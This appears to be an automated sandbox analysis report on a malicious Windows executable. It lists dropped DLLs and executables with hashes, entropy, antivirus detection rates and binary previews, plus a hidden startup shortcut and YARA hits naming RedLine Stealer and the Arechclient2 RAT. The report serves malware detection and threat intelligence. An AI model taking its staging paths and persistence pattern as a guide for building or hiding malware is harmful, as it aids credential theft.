                                                                                                                                                                                                                                            Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................`........................................p......l- ...@A.........................&..........@....P..x...............P/...`..\...................................................|...\....&..@....................text............................... ..`.rdata..l...........................@..@.data...DR..........................@....00cfg.......@......................@..@.rsrc...x....P......................@..@.reloc..\....`......................@..B........................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\u48o.0.exe
                                                                                                                                                                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):257872
                                                                                                                                                                                                                                            Entropy (8bit):6.727482641240852
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:6144:/yF/zX2zfRkU62THVh/T2AhZxv6A31obD6Hq/8jis+FvtVRpsAAs0o8OqTYz+xnU:/yRzX2zfRkX2T1h/SA5PF9m8jJqKYz+y
                                                                                                                                                                                                                                            MD5:4E52D739C324DB8225BD9AB2695F262F
                                                                                                                                                                                                                                            SHA1:71C3DA43DC5A0D2A1941E874A6D015A071783889
                                                                                                                                                                                                                                            SHA-256:74EBBAC956E519E16923ABDC5AB8912098A4F64E38DDCB2EAE23969F306AFE5A
                                                                                                                                                                                                                                            SHA-512:2D4168A69082A9192B9248F7331BD806C260478FF817567DF54F997D7C3C7D640776131355401E4BDB9744E246C36D658CB24B18DE67D8F23F10066E5FE445F6
                                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                            • Antivirus: Virustotal, Detection: 0%, Browse
                                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                                            Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................P...............................................Sg....@A........................Dv..S....w..........................P/.......5..8q...............................................{...............................text...&........................... ..`.rdata.............................@..@.data................|..............@....00cfg..............................@..@.rsrc...............................@..@.reloc...5.......6..................@..B........................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\u48o.0.exe
                                                                                                                                                                                                                                            File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):80880
                                                                                                                                                                                                                                            Entropy (8bit):6.920480786566406
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:1536:lw2886xv555et/MCsjw0BuRK3jteo3ecbA2W86b+Ld:lw28V55At/zqw+Iq9ecbA2W8H
                                                                                                                                                                                                                                            MD5:A37EE36B536409056A86F50E67777DD7
                                                                                                                                                                                                                                            SHA1:1CAFA159292AA736FC595FC04E16325B27CD6750
                                                                                                                                                                                                                                            SHA-256:8934AAEB65B6E6D253DFE72DEA5D65856BD871E989D5D3A2A35EDFE867BB4825
                                                                                                                                                                                                                                            SHA-512:3A7C260646315CF8C01F44B2EC60974017496BD0D80DD055C7E43B707CADBA2D63AAB5E0EFD435670AA77886ED86368390D42C4017FC433C3C4B9D1C47D0F356
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                            • Antivirus: Virustotal, Detection: 0%, Browse
                                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......................08e...................................................u............Rich............PE..L...|.0].........."!.........................................................0.......m....@A.............................................................A... ....... ..8............................ ..@............................................text............................... ..`.data...............................@....idata..............................@..@.rsrc...............................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\zLwT7vCojz.exe
                                                                                                                                                                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):8538160
                                                                                                                                                                                                                                            Entropy (8bit):7.894832692431241
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:196608:PYATHrqMo097ughAPM6R5b9dXXvRRHmRqB7:PzLqMo09aghAk6Lnfm4B7
                                                                                                                                                                                                                                            MD5:54D53F5BDB925B3ED005A84B5492447F
                                                                                                                                                                                                                                            SHA1:E3F63366D0CC19D48A727ABF1954B5FC4E69035A
                                                                                                                                                                                                                                            SHA-256:4D97E95F172CF1821EC078A6A66D78369B45876ABE5E89961E39C5C4E5568D68
                                                                                                                                                                                                                                            SHA-512:F6A5B88E02E8F4CB45F8AAE16A6297D6F0F355A5E5EAF2CBBE7C313009E8778D1A36631122C6D2BCFEA4833C2F22DFD488142B6391B9266C32D3205575A8FF72
                                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 3%
                                                                                                                                                                                                                                            • Antivirus: Virustotal, Detection: 3%, Browse
                                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                                            Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L...A..c.....................(t...................@.................................)....@......@..............................(4...0....r.............0P......x6...................................................................................text............................... ..`.itext..T........................... ..`.data...,'.......(..................@....bss.... S... ...........................idata..(4.......6..................@....didata.............................@....tls....<............2...................rdata...............2..............@..@.reloc..h6.......8...4..............@..B.rsrc.....r..0....r..l..............@..@.............@.......z..............@..@........................................................
                                                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\Qg_Appv5.exe
                                                                                                                                                                                                                                            File Type:PNG image data, 3680 x 2256, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):7175750
                                                                                                                                                                                                                                            Entropy (8bit):7.997145606333841
                                                                                                                                                                                                                                            Encrypted:true
                                                                                                                                                                                                                                            SSDEEP:98304:vH6iII1nFLrq9NF65iY3YZ019+s71up2h92Xf41tiE6Lldqib9dKuhSyVF8ZYGXO:/THrqMo097ughAPM6R5b9dXXvRRHmRqj
                                                                                                                                                                                                                                            MD5:15FE0C4C282DF938F0AE415334FC8D11
                                                                                                                                                                                                                                            SHA1:0B97FA302ED3F3C2B5DBB2DC8F0386E578EBC14D
                                                                                                                                                                                                                                            SHA-256:EE44025DB5AD03B33944BF734F6F256D8B996E89F2EC22197C1767FBAE70853D
                                                                                                                                                                                                                                            SHA-512:FAE66F89BC0007D59570A87EF815295A9499299086BBD2418DD17176C814A9FFC4559FC99B9FA2A1EC14E9D18B4206CE406CC483F04691F3A644CB6A84F932B5
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                                            Preview:.PNG........IHDR...`............{.. .IDATx..w\.......ET...kF...Ix...i...*ZVv...+%#eU....v.......:.\.....~..<.t...\.}.|.c.....................................................................@.,...............................W.................................._.$................................... ................................U@.,...............................W.................................._.$....................OLwM.#3q...Lk.<w......u@..J/..gQV..k...+.GyO..P".U@e.ep.g...>.L.../8..E...&Sv7a..'.........(WHLA....:7..\....9....}p=)....t..kUhW...".c.c.E..}).o..._X.......e3c.(.0........V.._.2...7..5.^-.i..8y..v.C..r..o.?~.f.HU...........8....3...?.........Y...&|.:.ZE..).;]..R.Z...KLxzT{.D.&.....I-.e.EM~Z.s.......W]at.sr~.[.Lyv..V:....s..U..bc...mQ[..-......E'-.......=."..e........g.Y.T.....v..q..N..;[....$..t........[P).....&..~g.gj...R...r..y......$.V=.*+......,.V. ..~.j.....`.....S...4._..%1..U...n...I....}.eb6.W.........d........i.}g..F9,[.*.
                                                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\driverRemote_debug\UniversalInstaller.exe
                                                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                                                            Category:modified
                                                                                                                                                                                                                                            Size (bytes):1513199
                                                                                                                                                                                                                                            Entropy (8bit):7.76549562224101
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24576:4BUqAOiscWrrxSf5xyF/UahfMHl4ka7Z1x1nsHf1tYV9+nEsNIviAziGulS50:4BUqtrrxSf5xyF/16laLxqdtYX+nEPvy
                                                                                                                                                                                                                                            MD5:9B62A2FBF34899D4700B9555F5FF3FEC
                                                                                                                                                                                                                                            SHA1:0D139FE038D02BFCA133843D423724673E7E01D1
                                                                                                                                                                                                                                            SHA-256:1D15AFBF9EADD8F5BD19E6F4CCAF62B3D77330AAD1FC89F712281DED2F820DF0
                                                                                                                                                                                                                                            SHA-512:0779F1E323BAB3F09438B25B1329F895309A64BCB377690AEBC61338273E0E55422F117640857D0E93D565BFE9598DD58DAAF727F8A1A680CCE6DAB7B834DCF0
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                                            Preview:|...~...........~...[...k...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................Z...;...Z........(.....,..............,..................................................<........:......................................................................................<.....6.........................................................................................Z..;...#.......:.................................................................................Q...M...........................................
                                                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\Qg_Appv5.exe
                                                                                                                                                                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                            Category:modified
                                                                                                                                                                                                                                            Size (bytes):1640960
                                                                                                                                                                                                                                            Entropy (8bit):6.484662993855079
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:49152:/7Q2CH7FiYk7q8wOP2nyh9VgFdJYZL6MsQv4Pvg3KIA8wuSgKacXTT3Kos2lpm:sZH7FZk7LP2nyh9VgFdJYZL6NQgPVIAv
                                                                                                                                                                                                                                            MD5:D1BA9412E78BFC98074C5D724A1A87D6
                                                                                                                                                                                                                                            SHA1:0572F98D78FB0B366B5A086C2A74CC68B771D368
                                                                                                                                                                                                                                            SHA-256:CBCEA8F28D8916219D1E8B0A8CA2DB17E338EB812431BC4AD0CB36C06FD67F15
                                                                                                                                                                                                                                            SHA-512:8765DE36D3824B12C0A4478C31B985878D4811BD0E5B6FBA4EA07F8C76340BD66A2DA3490D4871B95D9A12F96EFC25507DFD87F431DE211664DBE9A9C914AF6F
                                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 18%
                                                                                                                                                                                                                                            • Antivirus: Virustotal, Detection: 13%, Browse
                                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........?.e.^.6.^.6.^.6.&K6.^.6.&[6.^.6.^.6.].6.(V6.^.6.(b6[^.6.(c6._.6.(g6.^.6.(S6.^.6.(R6.^.6.(U6.^.6Rich.^.6................PE..L.....kU...........%.........4............................................................@..........................*..........T............................ .........................................@............................................text............................... ..`.rdata..Y;.......<..................@..@.data........0...^..................@....rsrc................p..............@..@.reloc..d.... .......v..............@..B................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\Qg_Appv5.exe
                                                                                                                                                                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):2469936
                                                                                                                                                                                                                                            Entropy (8bit):6.434916453080517
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:49152:Y8UMSn5cV2N9LNwtQ5gRR+moI1axGbYj6QAl4ImDkg7d5lROCDG5yzlC97W+uJUM:QMS5hN9OtQ5gRjoI8xGbYj6QAl4gg7dF
                                                                                                                                                                                                                                            MD5:9FB4770CED09AAE3B437C1C6EB6D7334
                                                                                                                                                                                                                                            SHA1:FE54B31B0DB8665AA5B22BED147E8295AFC88A03
                                                                                                                                                                                                                                            SHA-256:A05B592A971FE5011554013BCFE9A4AAF9CFC633BDD1FE3A8197F213D557B8D3
                                                                                                                                                                                                                                            SHA-512:140FEE6DAF23FE8B7E441B3B4DE83554AF804F00ECEDC421907A385AC79A63164BD9F28B4BE061C2EA2262755D85E14D3A8E7DC910547837B664D78D93667256
                                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                            • Antivirus: Virustotal, Detection: 0%, Browse
                                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........]..<...<...<...D...<...J...<...J).A<...J(..=...D...<...<...?...J,..=...J...<...J...<..Rich.<..........................PE..L... .kU..........................................@..........................0&......&&...@.................................H. ......0"...............%.0 ...."..K...................................C..@...............,..... .@....................text............................... ..`.rdata...=.......>..................@..@.data....-....!....... .............@....rsrc........0".......!.............@..@.reloc...N...."..P...@".............@..B................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\Qg_Appv5.exe
                                                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):20891
                                                                                                                                                                                                                                            Entropy (8bit):5.41735141652497
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:384:lhFF7DUQMnBNgCxPE/7tDEZAXMtV3STIxyd3A3lafgfdl6ii04ZQoUXXhnF6b2xD:fBMYqPE/7tDEZAK3STIxnlrn6U4ZhUXp
                                                                                                                                                                                                                                            MD5:FCE67E49E191BC3FD22997050C92BA01
                                                                                                                                                                                                                                            SHA1:34C08D6D404A94C2447B671A49731364EA0B47FF
                                                                                                                                                                                                                                            SHA-256:F8EB44951269696615DFA62E8221C73D8EBCE0A820211956D5BF6C0A70C6DACF
                                                                                                                                                                                                                                            SHA-512:4C4E1F908824DAA7F3081773CA22138C756601C6C6113E0DCF9CBC958E90A5028D9BE7E5404F19432D70B1E90D46919274188718D29F9A46B97E7ACBE8222991
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                                            Preview:.j.yvH.w....F.....m....^.OL`......c.`..Ldqsp.N.....v...\ae].yH.E.`^..d...m.W.U....L......]q..]hbT.Y.TLNcOP`.r.C.Lv.A...V^Fg.dr.i.^..o.GXp.H......yu...xEIAb.LGn_Y.........gjE[...hkhU..A..Adq.QlsO...`Rt..J]..s..u.j.......[lcxNuN.ZoANK..yth]q..t..DL.A`..Q.`_P...x.\..`..I.G.b.Iml.....MVfq.r[sE.HV..a.h.W.d.[QF.N...P.uaFNBdFj.s.W...x...Y...ZJ..x.u.iCyeyv.QxL.O..j.ckOGE^..xSv...^W].S.k\.en.VIuYfSuS...qu...f....K..]f...._.O.O.o.d...m.OArv...Lq....menEX..d..Qf..\FiRd.L.Vu.t.BJ...u.RR.JekI.PDg..g.H....\k..F..LX.a_.m..Bj.brCBh...v.a....ch.D[...G.....D....j.NaelL.F.^a.a.ur.^.tsN..ZH.Io.N.tr.f.exr.D.SNbHIR....]Jb.D.nlu..B.LnY..jp.n...bpmqb...Kc..y.ut.N._m.G.r.c..y.m..]cF.V.F...sMC.yrv..i....O..IAvn.vn..B.A.w.BDF...]M....b.G.XlB.xar..g.q...N..AU.E.Ox....R..k...vaP...S..sQ.....R[O..I.I.dma.T..S.E.y.a.FG...wOk..Q..\U.]..`..x\Z...ps.J..F.....Qf...Z.Pi.L..P.b.\.Tm.P.R.B.PU..d...k..[iS^.TH^N.hjrwwg._....wL....[.I.rt..g.]x..qh[Y.H.xn.N...A..wRF..W.V....jyU.Du.o...p..vO.m.lOTjk.HW.......L.dO....C..bQ.L..i.
                                                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\Qg_Appv5.exe
                                                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1385173
                                                                                                                                                                                                                                            Entropy (8bit):7.824453259021933
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24576:3ThHnVpIact6qMIPrpLhmwg9lUKOxrcP4912kZp/GYOQWINQvshJC6lVwymgw:DhHVfC6q7PrpLhmwDKOxrg4r2kEINQvX
                                                                                                                                                                                                                                            MD5:31885BEFE89EAE873D959F47BB548157
                                                                                                                                                                                                                                            SHA1:4A1D665C491D334EAE72CDD5B784F2A064A8FBBF
                                                                                                                                                                                                                                            SHA-256:A06A3D6810B4B5F73A0B71487F9B32538C34F66E26F0DC1632F3D40BF0E11B71
                                                                                                                                                                                                                                            SHA-512:0C1561929D19E52229E8FE3295148C8E4BC73526A59028F9FBB5BD11D2A8163CC6137232B55082AA1FC1E5F444F583064F4BC7BF282730B754BEE3C9656ED5D0
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                                            Preview:..ZJpL.......C\.bFNR.cgl\..j.......\u...KRCMZ....KY^.L..ap...BbB..J\.qH..o.e....]OZuwL..Nnvv..f.F.fV.T......n..Q....yhai....P.......l........O.sO.dX.RdX...L.i.q..UNub..IJ..C....FH.uq.xn..^Cfs..pb....RUlHfEr`..U....^wcX..Se.uYkc..kb.Z[O..K.F.u.i..pibZ]_O.`....\UJpL.eJ`..ro.xE.mJ]O.R...D.Cft...J..feJ...IuHV.fpvV.xnW.XaN..A..Z.JupSsC..u.N.Gm..j.L..[R.....Yv]U..hrwy.jV...oSK...ffiH..H.RK.gmJw.i.uK..rN.Ei.\PHj...gE...C..dC...u...N._.fYV.e.d.a..M.T....sd.k.....S.w.....R`k......Sd.Kg.i.\.m..p.w.s...]Gx..e^....Q...PBs.\W.e.Xv.....D.a[K].[V.Ku.^Q.s...Gu.d.LO.l.YN...k....QD.\..JN.tUG...OeM.KR..uK.t..V.RB.\.h.h....d.HA.t.i...[.an...y.....``^EiEXul.gUG..uH..Z.nGU....H..O.D...s.P.kmoSk.[ZVvO..X..ae..LqtTN..K.PDn...........]rZOy.V.Mq.bgP....xM..VD__....iup[.\Ma....ty.PKFid..g..nThl..w...ub......o.j.R.e....iuLb.p..wA.].d.f....Ub...mV.Xvv.U.f.E..A..Zv.ZP.d......LVi_...O..nwI\N.F...d..y..j..^C.Hu.Am[Jw.S]ul..d.m[..UQT.Hl..QDC.uZ..Ds.Z..W.X.w..^....ryJi`lj...O...xJ..jNVU.se.c.I.D.....O....P\GW`...Zn.E.x
                                                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\Qg_Appv5.exe
                                                                                                                                                                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1596416
                                                                                                                                                                                                                                            Entropy (8bit):6.466475314379774
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:49152:h2gm39uH+I5/GxEoadcqX7Q9F7r40YB+eTMq+PDXx1lWz0pd:tmtuH+e/RoadcqX7Qz7rDY8vq+Pbx1lc
                                                                                                                                                                                                                                            MD5:EA945E6BC518D0B25AAC0FCE13AE6E16
                                                                                                                                                                                                                                            SHA1:4144AC69F72190F1AD163A7CC7BD38E18109122C
                                                                                                                                                                                                                                            SHA-256:6D9D8727E9D8C00EB74B27C6EE3FDC90D538F30CF6A07C4B939A03FC70CE59EE
                                                                                                                                                                                                                                            SHA-512:4E2F4CF61FC6364DDACA6B0BF6D917F8E136526DC1323A8BAA48166CB291285491CC2D083B65EBE30F3DC27F62B2E154A834C721140E6004596D655269239A95
                                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                            • Antivirus: Virustotal, Detection: 0%, Browse
                                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......S1,..PB..PB..PB.x&.<PB.x&.PB.x&.cQB..(...PB..(.>PB..PC..SB.x&..PB.x&..PB.x&..PB.x&..PB.Rich.PB.........PE..L.....kU...........%.....\...........0.......p......................................1.....@.................................dP..|....p...............................}..................................@............p..,............................text...6Z.......\.................. ..`.rdata..J....p.......`..............@..@.data...\........Z...t..............@....rsrc........p......................@..@.reloc..6...........................@..B........................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\driverRemote_debug\UniversalInstaller.exe
                                                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                                                            Category:modified
                                                                                                                                                                                                                                            Size (bytes):1513199
                                                                                                                                                                                                                                            Entropy (8bit):7.765495676253857
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24576:ABUqAOiscWrrxSf5xyF/UahfMHl4ka7Z1x1nsHf1tYV9+nEsNIviAziGulS50:ABUqtrrxSf5xyF/16laLxqdtYX+nEPvy
                                                                                                                                                                                                                                            MD5:B8A6D044F40D799762522BEC449D8F39
                                                                                                                                                                                                                                            SHA1:9F89B3CF6F740AA8CAFBD4AD0D2B80C3CC9537D8
                                                                                                                                                                                                                                            SHA-256:503AE27E37C3327A911156249B6B4349579C30AF9199A152B09EBB0D7278366D
                                                                                                                                                                                                                                            SHA-512:E0D072837E7F72A4D64BA36C8CD92E85C4C9799C629B92243D2B070ECF3828EA143CD125ED5DA2680B19B960CE164D350283A3A1BF1D60531181F51E9D8AE13E
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                                            Preview:|...~...........~...[...k...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................Z...;...Z........(.....,..............,..................................................<........:......................................................................................<.....6.........................................................................................Z..;...#.......:.................................................................................Q...M...........................................
                                                                                                                                                                                                                                            Process:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                            File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Tue Apr 23 06:43:20 2024, mtime=Tue Apr 23 06:43:21 2024, atime=Tue Apr 23 06:43:20 2024, length=2469936, window=hide
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1038
                                                                                                                                                                                                                                            Entropy (8bit):4.97708962914361
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:8fru2B9klJmXOIxlEmli90AlZB4SiIoCuadZtm:8fru2BYmeIomliBl53h/Zt
                                                                                                                                                                                                                                            MD5:311BB9403B40135D395CD921664DED20
                                                                                                                                                                                                                                            SHA1:E2E1FFBDB33E13F125AAD977D1E8AF5D6CEC2BA7
                                                                                                                                                                                                                                            SHA-256:D5EC91A372BB5810E069E717A36B8A07C54224479E16205C624CD9B2962D313D
                                                                                                                                                                                                                                            SHA-512:39750D9A57BFFA3A595A5A9500A9B739156A5178C7C30135393216DF1D195DDBA45D5DA2F3A749184C410C8F7964E3E970942B99BCCB7B71AB56249786A7BF74
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                                            Preview:L..................F.... ...m7..Q...E...Q.....O.Q...0.%.......................:..DG..Yr?.D..U..k0.&...&......Qg.*_...~...Q....~.xa.......t...CFSF..1.....EW.=..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW.=.XUL..........................3*N.A.p.p.D.a.t.a...B.V.1......Xk=..Roaming.@......EW.=.Xo=..........................f2..R.o.a.m.i.n.g.....n.1......Xk=..DRIVER~1..V......Xk=.Xo=.....=....................d5..d.r.i.v.e.r.R.e.m.o.t.e._.d.e.b.u.g.....z.2.0.%..Xk= .UNIVER~1.EXE..^......Xk=.Xk=.....=......................0.U.n.i.v.e.r.s.a.l.I.n.s.t.a.l.l.e.r...e.x.e.......{...............-.......z............{^......C:\Users\user\AppData\Roaming\driverRemote_debug\UniversalInstaller.exe..O.....\.....\.....\.....\.f.r.o.n.t.d.e.s.k.\.A.p.p.D.a.t.a.\.R.o.a.m.i.n.g.\.d.r.i.v.e.r.R.e.m.o.t.e._.d.e.b.u.g.\.U.n.i.v.e.r.s.a.l.I.n.s.t.a.l.l.e.r...e.x.e.`.......X.......287400...........hT..CrF.f4... ..y.T....,......hT..CrF.f4... ..y.T....,......E.......9...1SPS..mD..pH.H@..=x....
                                                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\u48o.1.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:modified
                                                                                                                                                                                                                                            Size (bytes):4282
                                                                                                                                                                                                                                            Entropy (8bit):5.517171550223942
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:96:SMWR5u33uKsTckgUEJ56fJIPAIPAIPAIP6P6P6P/P/PWrusfrZ:SMA5bKsTckgUEJ56+PJPJPJP6P6P6P/0
                                                                                                                                                                                                                                            MD5:97778FFCBEE0E386F61C3CBC3CB433F1
                                                                                                                                                                                                                                            SHA1:072C632B7716934FA1AADE335809EF97D82617F5
                                                                                                                                                                                                                                            SHA-256:5B066B4DA46415A278445B0544E4F9AC2F10E55159BBCF625F75160AC483F187
                                                                                                                                                                                                                                            SHA-512:0319A61C603ED2AAD13BF2DBCCF6C718F8EA8E00B73D7544B19459AC8AC045A2A42EF6FB0BF9CBE82E2BDB15350BE50E37445668FDD99175C6A8D5F61D7C44F7
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                                            Preview:[04/23/24 09:43:19] Main : OS Version = osWin10...[04/23/24 09:43:19] CommandLineSwitchExists : Result of check = False. Param Value (if not exact match) = ...[04/23/24 09:43:19] Installer Target URL request = {"IPAddress":"192.168.2.7","Status":1,"Language":"en","OSMinorVersion":0,"OSMajorVersion":10,"ProductId":"5488CB36-BE62-4606-B07B-2EE938868BD1","Is64Bit":true,"ECommId":"11A12794-499E-4FA0-A281-A9A9AA8B2685"}...[04/23/24 09:43:20] Installer target url response = {"Url":"https://download.iolo.net/sm/24/11A12794-499E-4FA0-A281-A9A9AA8B2685/24.3.0.57/SystemMechanic.exe","ProductName":"System Mechanic Standard","Result":0,"ErrorMessage":null}...[04/23/24 09:43:20] DownloadAndLaunchInstaller : Creating BITS download handler...[04/23/24 09:43:20] !&TioloBITSHandler.InitCopyMgr : CreateCOMObject(CLSID_BackgroundCopyManager1_5)..[04/23/24 09:43:26] !&TioloBITSHandler.InitCopyMgr : Copy manager initialized = True...[04/23/24 09:43:26] DownloadAndLaunchInstaller : Target folder ="C:\User
                                                                                                                                                                                                                                            Process:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                            Category:modified
                                                                                                                                                                                                                                            Size (bytes):785920
                                                                                                                                                                                                                                            Entropy (8bit):6.809737341976147
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:12288:QiMA0ejRLfxLY8flLb1MgXeXbFAsFWylkkoAbtEIwhsrU:QeDxttLeLFAsFlSjf
                                                                                                                                                                                                                                            MD5:33230F52772BD46C208DFE85537F567F
                                                                                                                                                                                                                                            SHA1:260AAB3C0DD5909C449B62DA56998F8ABD68A235
                                                                                                                                                                                                                                            SHA-256:3F1759A3D89D7B7893BBCDEB180BAB911C960A6D1C80A04BCDA199A8284C36EA
                                                                                                                                                                                                                                            SHA-512:98E3B0337ABD53BA405F76D1FCE17F9EC173C507B3DD3B89A259950AEE744FB337767BC534E817BF1DB7D5B692245DC5A3CF351BED06980DDEE2B0F19A48B10B
                                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                                            Yara Hits:
                                                                                                                                                                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: C:\Users\user\AppData\Local\Temp\pfswlxy, Author: Joe Security
                                                                                                                                                                                                                                            • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: C:\Users\user\AppData\Local\Temp\pfswlxy, Author: Joe Security
                                                                                                                                                                                                                                            • Rule: MALWARE_Win_Arechclient2, Description: Detects Arechclient2 RAT, Source: C:\Users\user\AppData\Local\Temp\pfswlxy, Author: ditekSHen
                                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                                            • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 59%
                                                                                                                                                                                                                                            • Antivirus: Virustotal, Detection: 60%, Browse
                                                                                                                                                                                                                                            Reputation:unknown
